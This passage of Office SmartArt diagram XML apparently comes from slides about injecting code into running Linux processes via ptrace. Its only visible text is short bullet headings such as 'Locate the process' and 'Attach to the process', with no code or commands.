    <dgm:cxn modelId="{4BAF338D-E5B4-634D-B790-AE4133255C31}" type="presParOf" srcId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" destId="{7C702D4A-805C-4709-9501-BF99C9CF1ECF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{715FA787-9945-5047-9008-9F33A5164CDF}" type="presParOf" srcId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" destId="{42F53EE7-205C-4479-B7E7-30F375FF97F1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{8BF4FB44-4AD9-D54D-B6EE-D36FF10AF8CB}" type="presParOf" srcId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" destId="{C24C16FA-473F-478C-840A-66A837482437}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A8460AE3-C0A0-1849-A3D4-27CD037C6BA1}" type="presParOf" srcId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" destId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{040834BC-94E4-4D43-AD1B-50196D8053DD}" type="presParOf" srcId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" destId="{54356A9D-49B1-4B54-98AE-7772723EB46D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{55169DE1-95AF-7347-B44C-802EFC5F0A37}" type="presParOf" srcId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" destId="{C147EFA6-B33D-4886-97A4-28B4D5E8BC2C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{76DA3541-330C-CA45-A8A2-648881F39F5B}" type="presParOf" srcId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" destId="{332D4370-CC2C-44E3-8BEF-3B2727516FAF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{EF8035FE-D82D-D94D-9CAE-A6ACCFFA808F}" type="presParOf" srcId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" destId="{9EB46A9A-4460-4931-BDF8-2B7D0589900F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B6EE6B6B-BF1D-7148-81FB-2D346990448F}" type="presParOf" srcId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" destId="{E4BF76B1-A3B8-4822-8C23-4ECD5526BE8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D9370D-E3B6-4565-851E-A63005D0F9C0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7FF00C2-2806-4201-A36A-8BED30D8D0F9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Turn a good process into a bad one</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33D88F3E-3C67-483C-A444-0E5AFCE87A43}" type="parTrans" cxnId="{D301AEE9-E678-4AFD-870B-445A3AF5ED84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6F2457F-28F9-442B-B36F-223FAEB5551D}" type="sibTrans" cxnId="{D301AEE9-E678-4AFD-870B-445A3AF5ED84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083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Run in another process memory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A07DCED-7D5C-4954-864B-4CA010CEE4C9}" type="parTrans" cxnId="{084327A4-3EF0-4875-948D-56FA1C6F6D12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6612D185-9C42-44DF-8328-D6B4A57F919D}" type="sibTrans" cxnId="{084327A4-3EF0-4875-948D-56FA1C6F6D12}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C03B945E-F6D1-486C-85E5-2118FDBEB20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Evades detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6C2807E-7894-42A1-B1F1-C209B4EA0EE0}" type="parTrans" cxnId="{38B7A266-0DA9-4A89-8E3A-F9DF2084CC07}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4950BDE5-4C63-4371-9F8A-92B4E1E87C97}" type="sibTrans" cxnId="{38B7A266-0DA9-4A89-8E3A-F9DF2084CC07}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94990D67-1653-484B-B8D8-F144B50E81F7}" type="pres">
      <dgm:prSet presAssocID="{3CD9370D-E3B6-4565-851E-A63005D0F9C0}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50AE48BB-1D68-F743-8EA9-33A2457482D1}" type="pres">
      <dgm:prSet presAssocID="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{03C3881B-ABD5-1249-B06E-DA1579633B16}" type="pres">
      <dgm:prSet presAssocID="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9DCAE8C-E851-F84F-82E9-4D0B82C0D96A}" type="pres">
      <dgm:prSet presAssocID="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="278" custLinFactNeighborY="18467"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E48C4EBA-AD4A-F846-B5E2-729CBBEEAA3D}" type="pres">
      <dgm:prSet presAssocID="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E61E4CC6-A70A-6E42-BAB8-435E77825B4D}" type="pres">
      <dgm:prSet presAssocID="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D6BF885-AC96-5B49-A944-7249E004370E}" type="pres">
      <dgm:prSet presAssocID="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{768CD127-76CD-7F49-8D21-F00CA44BB67A}" type="pres">
      <dgm:prSet presAssocID="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EF30270-DE86-6742-BE74-7D72A91E5110}" type="pres">
      <dgm:prSet presAssocID="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE134243-9362-1949-B1AA-07496CBFFADD}" type="pres">
      <dgm:prSet presAssocID="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{22249D70-F8CA-6D40-9821-55D69010A788}" type="pres">
      <dgm:prSet presAssocID="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7E07F9F-213E-7D4E-A866-49DD69399BA5}" type="pres">
      <dgm:prSet presAssocID="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9FDAC9EB-77AD-A844-8A0F-CA98B357B4F8}" type="pres">
      <dgm:prSet presAssocID="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{03593602-85C9-0044-A0FD-649F02346DB9}" type="presOf" srcId="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" destId="{F9DCAE8C-E851-F84F-82E9-4D0B82C0D96A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3EF4E41C-C456-F043-8007-6112997169C4}" type="presOf" srcId="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" destId="{B7E07F9F-213E-7D4E-A866-49DD69399BA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{80499A4E-B142-4B46-8D04-902A33ED8DD7}" type="presOf" srcId="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" destId="{768CD127-76CD-7F49-8D21-F00CA44BB67A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{38B7A266-0DA9-4A89-8E3A-F9DF2084CC07}" srcId="{3CD9370D-E3B6-4565-851E-A63005D0F9C0}" destId="{C03B945E-F6D1-486C-85E5-2118FDBEB202}" srcOrd="2" destOrd="0" parTransId="{C6C2807E-7894-42A1-B1F1-C209B4EA0EE0}" sibTransId="{4950BDE5-4C63-4371-9F8A-92B4E1E87C97}"/>
    <dgm:cxn modelId="{084327A4-3EF0-4875-948D-56FA1C6F6D12}" srcId="{3CD9370D-E3B6-4565-851E-A63005D0F9C0}" destId="{A253DF4F-A18A-4AF9-BBD2-F931F9A24083}" srcOrd="1" destOrd="0" parTransId="{5A07DCED-7D5C-4954-864B-4CA010CEE4C9}" sibTransId="{6612D185-9C42-44DF-8328-D6B4A57F919D}"/>
    <dgm:cxn modelId="{24CAECD6-48AF-F648-802C-006A753EA104}" type="presOf" srcId="{3CD9370D-E3B6-4565-851E-A63005D0F9C0}" destId="{94990D67-1653-484B-B8D8-F144B50E81F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D301AEE9-E678-4AFD-870B-445A3AF5ED84}" srcId="{3CD9370D-E3B6-4565-851E-A63005D0F9C0}" destId="{A7FF00C2-2806-4201-A36A-8BED30D8D0F9}" srcOrd="0" destOrd="0" parTransId="{33D88F3E-3C67-483C-A444-0E5AFCE87A43}" sibTransId="{F6F2457F-28F9-442B-B36F-223FAEB5551D}"/>
    <dgm:cxn modelId="{EB15076E-8CD9-2448-8959-3E0BF8456F5B}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{50AE48BB-1D68-F743-8EA9-33A2457482D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A2E5B41D-B5C9-4544-80BB-207C05AE639C}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{03C3881B-ABD5-1249-B06E-DA1579633B16}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E4BA1E47-4252-5B4F-A480-AAA0F4BC192F}" type="presParOf" srcId="{03C3881B-ABD5-1249-B06E-DA1579633B16}" destId="{F9DCAE8C-E851-F84F-82E9-4D0B82C0D96A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{868AD075-D954-394F-BD38-F1C9D5A3AD68}" type="presParOf" srcId="{03C3881B-ABD5-1249-B06E-DA1579633B16}" destId="{E48C4EBA-AD4A-F846-B5E2-729CBBEEAA3D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{30D8080D-D5E7-5E45-8D38-C9A2B30F2EA7}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{E61E4CC6-A70A-6E42-BAB8-435E77825B4D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D72EA7F1-432D-E248-8EAA-51B59A30F282}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{1D6BF885-AC96-5B49-A944-7249E004370E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8773F8A4-CC1E-F14C-A314-D32DF3513076}" type="presParOf" srcId="{1D6BF885-AC96-5B49-A944-7249E004370E}" destId="{768CD127-76CD-7F49-8D21-F00CA44BB67A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E26F7C35-3F71-E440-96E7-CE494B418A42}" type="presParOf" srcId="{1D6BF885-AC96-5B49-A944-7249E004370E}" destId="{1EF30270-DE86-6742-BE74-7D72A91E5110}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1B2553A2-A096-6644-BFC3-95D408A5CC46}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{BE134243-9362-1949-B1AA-07496CBFFADD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{89C7D859-CA03-CD46-896C-867200E0510E}" type="presParOf" srcId="{94990D67-1653-484B-B8D8-F144B50E81F7}" destId="{22249D70-F8CA-6D40-9821-55D69010A788}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D4596F1D-2BC3-1E40-8DE7-E0955CB48507}" type="presParOf" srcId="{22249D70-F8CA-6D40-9821-55D69010A788}" destId="{B7E07F9F-213E-7D4E-A866-49DD69399BA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A5A7A4D6-E11E-1545-A2FE-75C1320446BD}" type="presParOf" srcId="{22249D70-F8CA-6D40-9821-55D69010A788}" destId="{9FDAC9EB-77AD-A844-8A0F-CA98B357B4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9B059D-B11D-4B4D-A9E1-BF6C65A04DE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23617C-E284-4E46-84F4-BCE67512CF9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Well, no API, bummer!</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93A488CE-7FCF-41AA-A8EA-BA57D28B5DEF}" type="parTrans" cxnId="{7E89FD9C-A666-4C43-B724-90FC30D8AC3C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45E7C583-2BD2-494A-B11F-8F08D14F012C}" type="sibTrans" cxnId="{7E89FD9C-A666-4C43-B724-90FC30D8AC3C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EAAFF42-DB0B-4383-9745-9AABA10F2B2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>PTRACE</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B77079DE-D1C1-4E91-833E-28298C1B5789}" type="parTrans" cxnId="{C6C8B191-CDB1-4ED5-8949-1681B8930638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{688637C9-45EF-4939-89E4-3B64CEB7667B}" type="sibTrans" cxnId="{C6C8B191-CDB1-4ED5-8949-1681B8930638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E79B2C10-52C0-469B-A179-E0E619FC496E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Why was this introduced? </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7909B12-9151-4815-9BF5-1DC08F2F805B}" type="parTrans" cxnId="{0B8E24BA-851A-44AE-A424-1F75BF107D9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CE8CEA8-C112-41F6-8CDB-C97435CB3383}" type="sibTrans" cxnId="{0B8E24BA-851A-44AE-A424-1F75BF107D9C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{112D4F47-971E-4FD6-8D59-4B39A1C4E02B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Patching into Running process</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D2CADDA-6A6C-4DBA-B8A0-5BDCFEA89BC0}" type="parTrans" cxnId="{A327DBF9-F763-4FA3-AAF9-D6DE92995FDD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8669C19-9DFD-4340-B715-B1E362C09E13}" type="sibTrans" cxnId="{A327DBF9-F763-4FA3-AAF9-D6DE92995FDD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51F5BDDF-C46B-413C-B135-2CB82386D1FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Locate the process </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A9665BE-C2CA-45C8-B777-26493B8AC6EE}" type="parTrans" cxnId="{C8BB9458-6526-41E0-B7BF-548E503A8951}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BCEE3BF-3CD7-4040-8FB5-8DFA33981702}" type="sibTrans" cxnId="{C8BB9458-6526-41E0-B7BF-548E503A8951}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E90185B-54DC-4224-8BD1-702ADA7CD790}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Attach to the process</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5A014F3-244D-4CDC-9C2B-92D16B9892AB}" type="parTrans" cxnId="{A797D277-FA70-4806-BBD8-A645DD3C81FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{263A430D-5988-47A3-ACF1-3CB5EDB157E0}" type="sibTrans" cxnId="{A797D277-FA70-4806-BBD8-A645DD3C81FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{582DB4CF-EF93-4859-888A-BF1457ECE7B7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Challenges, Where to attach ? </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B892C4C-384F-4E22-8CC3-9A493EAB4AAF}" type="parTrans" cxnId="{EF484496-F114-4CBA-96B3-18B5B25889B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24525C0D-A2E7-4D80-8DF1-03B5EECF45D2}" type="sibTrans" cxnId="{EF484496-F114-4CBA-96B3-18B5B25889B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{671635DF-55A8-3545-942F-23485DB39334}" type="pres">
      <dgm:prSet presAssocID="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6436D210-5165-9844-AE6B-199AA9768B9C}" type="pres">
      <dgm:prSet presAssocID="{9D23617C-E284-4E46-84F4-BCE67512CF9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C25E08A2-3F4E-9044-8338-32061F5A4A70}" type="pres">
      <dgm:prSet presAssocID="{45E7C583-2BD2-494A-B11F-8F08D14F012C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{281A2E18-D3A1-5644-8CD3-77FC2B124FEB}" type="pres">
      <dgm:prSet presAssocID="{6EAAFF42-DB0B-4383-9745-9AABA10F2B2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E6BCBFB-9237-1B4B-90E8-183E337F0505}" type="pres">
      <dgm:prSet presAssocID="{688637C9-45EF-4939-89E4-3B64CEB7667B}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE9C9BD9-CA85-F141-A04E-205071AB6C7B}" type="pres">
      <dgm:prSet presAssocID="{E79B2C10-52C0-469B-A179-E0E619FC496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EB6ADB6-3946-2042-ADE4-8B96B92A59E1}" type="pres">
      <dgm:prSet presAssocID="{8CE8CEA8-C112-41F6-8CDB-C97435CB3383}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDDBCC65-35A1-6047-8B7E-232897FDB6F4}" type="pres">
      <dgm:prSet presAssocID="{112D4F47-971E-4FD6-8D59-4B39A1C4E02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FE6643A-41F7-B943-ACB0-015B0042ED02}" type="pres">
      <dgm:prSet presAssocID="{C8669C19-9DFD-4340-B715-B1E362C09E13}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53EDFA43-5743-A248-A51D-DA73459675E8}" type="pres">
      <dgm:prSet presAssocID="{51F5BDDF-C46B-413C-B135-2CB82386D1F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60F64F4-F3CA-0641-BC34-6CEB2F0FFE66}" type="pres">
      <dgm:prSet presAssocID="{9BCEE3BF-3CD7-4040-8FB5-8DFA33981702}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AADAE5DF-0439-5246-8034-E3AEC07E0204}" type="pres">
      <dgm:prSet presAssocID="{5E90185B-54DC-4224-8BD1-702ADA7CD79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1BB5537-1B9D-5444-A33F-E0BEB311F071}" type="pres">
      <dgm:prSet presAssocID="{263A430D-5988-47A3-ACF1-3CB5EDB157E0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA761FD9-D406-9540-B3EC-3DF46FDFE96A}" type="pres">
      <dgm:prSet presAssocID="{582DB4CF-EF93-4859-888A-BF1457ECE7B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DE9EB0B-F51C-194D-8F0A-18E0E4457ED2}" type="presOf" srcId="{582DB4CF-EF93-4859-888A-BF1457ECE7B7}" destId="{DA761FD9-D406-9540-B3EC-3DF46FDFE96A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C8BB9458-6526-41E0-B7BF-548E503A8951}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{51F5BDDF-C46B-413C-B135-2CB82386D1FD}" srcOrd="4" destOrd="0" parTransId="{0A9665BE-C2CA-45C8-B777-26493B8AC6EE}" sibTransId="{9BCEE3BF-3CD7-4040-8FB5-8DFA33981702}"/>
    <dgm:cxn modelId="{378B5175-EFEC-6343-B9E7-FFB0DBAAC11C}" type="presOf" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{671635DF-55A8-3545-942F-23485DB39334}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A797D277-FA70-4806-BBD8-A645DD3C81FE}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{5E90185B-54DC-4224-8BD1-702ADA7CD790}" srcOrd="5" destOrd="0" parTransId="{E5A014F3-244D-4CDC-9C2B-92D16B9892AB}" sibTransId="{263A430D-5988-47A3-ACF1-3CB5EDB157E0}"/>
    <dgm:cxn modelId="{C6C8B191-CDB1-4ED5-8949-1681B8930638}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{6EAAFF42-DB0B-4383-9745-9AABA10F2B2F}" srcOrd="1" destOrd="0" parTransId="{B77079DE-D1C1-4E91-833E-28298C1B5789}" sibTransId="{688637C9-45EF-4939-89E4-3B64CEB7667B}"/>
    <dgm:cxn modelId="{EF484496-F114-4CBA-96B3-18B5B25889B4}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{582DB4CF-EF93-4859-888A-BF1457ECE7B7}" srcOrd="6" destOrd="0" parTransId="{1B892C4C-384F-4E22-8CC3-9A493EAB4AAF}" sibTransId="{24525C0D-A2E7-4D80-8DF1-03B5EECF45D2}"/>
